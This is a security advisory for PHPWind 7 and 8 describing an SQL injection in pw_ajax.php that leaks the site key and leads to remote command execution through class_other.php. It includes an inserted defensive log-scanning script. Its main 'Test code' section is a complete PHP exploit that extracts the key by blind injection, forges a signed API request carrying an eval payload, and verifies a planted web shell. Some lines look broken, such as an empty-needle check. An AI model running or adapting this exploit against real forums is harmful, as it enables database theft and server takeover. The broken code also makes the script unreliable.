Affected systems
Phpwind 7
Phpwind 8
Detailed description
Phpwind 7 and 8 contain an input validation vulnerability that attackers can exploit to remotely execute arbitrary PHP code.
The problem lies in pw_ajax.php: data submitted in the fieldname parameter is not sufficiently filtered, so an attacker can perform SQL injection and read data from any table in the database.
In addition, class_other.php has an arbitrary command execution vulnerability due to insufficient filtering of the $class[cid] input. Reaching this logic requires a key, which can be obtained through the injection vulnerability above.
PHPWind has a SQL injection vulnerability which malicious people can exploit to conduct SQL injection attacks.
Input passed to the "fieldname" parameter in pw_ajax.php is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
In addition, input passed to the "$class[cid]" parameter in class_other.php is not properly sanitised before being used in a SQL query. Reaching this code requires an important key, which an attacker could obtain by exploiting the SQL injection vulnerability above.
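A defender-side check for the two request patterns described above, added here as an example (it is not part of the advisory or of PHPWind): it flags pw_ajax.php requests whose fieldname is not a bare column name, pw_api.php threadscategory calls carrying nested serialized cid arrays, and per-IP bursts of pw_ajax.php requests of the kind a byte-by-byte blind extraction produces. The log format, the sample lines and BURST_THRESHOLD are constructed assumptions.

```python
import re
from collections import Counter
from urllib.parse import parse_qs

# Constructed sample: "ip method path body". Assumes the WAF or audit log
# records POST bodies (a stock access log would not show the fieldname value).
SAMPLE_LOG = """\
10.0.0.5 POST /phpwind/pw_ajax.php action=pcdelimg&fieldname=db_value%20from%20pw_config%20where%20db_value%20like%200x6125%23
10.0.0.5 POST /phpwind/pw_ajax.php action=pcdelimg&fieldname=db_value%20from%20pw_config%20where%20db_value%20like%200x6225%23
10.0.0.5 POST /phpwind/pw_ajax.php action=pcdelimg&fieldname=db_value%20from%20pw_config%20where%20db_value%20like%200x6325%23
10.0.0.9 POST /phpwind/pw_ajax.php action=pcdelimg&fieldname=avatar
10.0.0.5 GET /phpwind/pw_api.php mode=other&method=threadscategory&params=a%3A1%3A%7Bs%3A3%3A%22cid%22%3Ba%3A1%3A%7B&type=app&sig=0123456789abcdef0123456789abcdef
"""
IDENT = re.compile(r"[A-Za-z0-9_]+")   # what a legitimate fieldname looks like
BURST_THRESHOLD = 3                    # hypothetical: pw_ajax.php hits per IP in the window

def fieldname_is_suspicious(body):
    """A column name never needs spaces, quotes, hex literals or comment markers."""
    values = parse_qs(body).get("fieldname", [])
    return any(not IDENT.fullmatch(v) for v in values)

def is_nested_cid_params(body):
    """The forged threadscategory call wraps cid in nested serialized arrays."""
    q = parse_qs(body)
    params = q.get("params", [""])[0]
    return q.get("method") == ["threadscategory"] and 'a:1:{s:3:"cid";a:' in params

def analyze(log_text):
    findings, ajax_hits = [], Counter()
    for line in log_text.splitlines():
        parts = line.split(" ", 3)
        if len(parts) < 3:
            continue
        ip, path = parts[0], parts[2]
        body = parts[3] if len(parts) == 4 else ""
        if path.endswith("/pw_ajax.php"):
            ajax_hits[ip] += 1
            if fieldname_is_suspicious(body):
                findings.append((ip, "pw_ajax.php fieldname is not a bare column name"))
        elif path.endswith("/pw_api.php") and is_nested_cid_params(body):
            findings.append((ip, "pw_api.php threadscategory with nested serialized cid"))
    for ip, n in ajax_hits.items():   # the PoC needs up to 16 guesses per key digit
        if n >= BURST_THRESHOLD:
            findings.append((ip, f"{n} pw_ajax.php requests: possible blind byte-wise extraction"))
    return findings

if __name__ == "__main__":
    for ip, why in analyze(SAMPLE_LOG):
        print(ip, why)
```

The identifier whitelist in fieldname_is_suspicious is also the server-side fix: a column name parameter should be matched against a fixed list of allowed names rather than concatenated into the query.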
Test code
<?php
echo "
Info: PoC for Phpwind Remote Command Execution
Test: exploit.php user password http://www.blackxl.org/phpwind/
";
if ($argc < 4) {            // script name plus three arguments
    echo "parameter missing";
    die();
}
$user  = $argv[1];
$pass  = $argv[2];
$pwurl = $argv[3];
$myheader = array(
    'Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=100',
    'Accept-Language: zh-cn,zh;q=100',
    'Accept-Charset: gb2312,utf-8;q=0.7,*;q=100',
    'Content-Type: application/x-www-form-urlencoded; charset=UTF-8',
    'Referer: http://www.blackxl.org',
    'Connection: Keep-alive',
    'Cache-Control: no-cache',
    'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; InfoPath.2)'
);
$cookie = "";
// Log in and collect the session cookies from the response headers
$str = curlsend("$pwurl/login.php?", "POST", 0, $myheader, "forward=&jumpurl=http%3A%2F%2F127.0.0.1%2FPHPWind/upload%2F&step=2&lgt=0&pwuser=$user&pwpwd=$pass&hideid=0&cktime=31536000&submit=%B5%C7%C2%BC", 1);
preg_match_all("/Set-Cookie:([^;]+)/is", $str, $array);
for ($i = 0; $i < count($array[1]); $i++) {
    $cookie = $cookie . ";" . $array[1][$i];
}
// echo $cookie;
$test = curlsend("$pwurl/pw_ajax.php", "POST", 0, $myheader, '', 1);
if (strpos($test, '')) {    // the needle string is not recoverable from the advisory text
    die('user password or other parameter error');
}
// Blind injection through the fieldname parameter: one hex digit of the key per request
$shellcode = "action=pcdelimg&fieldname=db_value%20from%20pw_config%20where%20db_name%20like%between%20and%20db_value%20like%200x{offset}25%20union%20select%200x612e2e;%23";
$hash = "0123456789abcdef";
$craked = "";
for ($i = 0; $i < 32; $i++) {
    for ($n = 0; $n < 16; $n++) {
        $tmp = str_replace("{offset}", bin2hex($craked . $hash[$n]), $shellcode);
        $tmp = curlsend("$pwurl/pw_ajax.php", "POST", 0, $myheader, $tmp, 0);
        if (strpos($tmp, "pw_config")) {
            echo "Cracked Offset " . ($i + 1) . ":" . $hash[$n] . "\n";
            $craked = $craked . $hash[$n];
            break;
        }
    }
}
echo "Cracked Magicdata:" . $craked . "\n";
echo "Get shell:";
// Another 0day
$arg = '';
$hack = array();
$hack['mode']   = 'other';
$hack['method'] = 'threadscategory';
$hack['params'] = 'a:1:{s:3:"cid";a:1:{s:3:"cid";a:1:{s:3:"cid";s:21:"' . eval($_GET[c]) . 'abc";}}}';
$hack['type']   = 'app';
$hack = strips($hack);
ksort($hack);
reset($hack);
foreach ($hack as $key => $value) {
    if ($value && $key != 'sig') {
        $arg .= "$key=$value&";
    }
}
$arg .= 'sig=' . md5($arg . $craked);   // the API signature is md5(args . magic key)
echo file_get_contents("$pwurl/pw_api.php?" . $arg);
echo "OK";
$str = file_get_contents("$pwurl/data/bbscache/info_class.php?c=echo%20Just_wooyun;");
if (strpos($str, 'wooyun')) {
    echo "Got shell:" . "$pwurl/data/bbscache/info_class.php?c=phpinfo();";
    echo "Over!";
}

function strips($param) {
    if (is_array($param)) {
        foreach ($param as $key => $value) {
            $param[$key] = strips($value);
        }
    } else {
        $param = stripslashes($param);
    }
    return $param;
}

function curlsend($url, $method = false, $ssl = 0, $myheader, $data = '', $header = 0) {
    global $cookie;
    $ch = curl_init();
    $timeout = 0; // set to zero for no timeout
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, $method);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $myheader);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
    curl_setopt($ch, CURLOPT_COOKIE, $cookie);
    if ($data) {
        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    }
    curl_setopt($ch, CURLOPT_HEADER, $header);
    if ($ssl) {
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
    }
    $handles = curl_exec($ch);
    curl_close($ch);
    // echo $handles;
    return $handles;
}
Solution
Currently no detailed solution is available; refer to the vendor site:
http://www.phpwind.net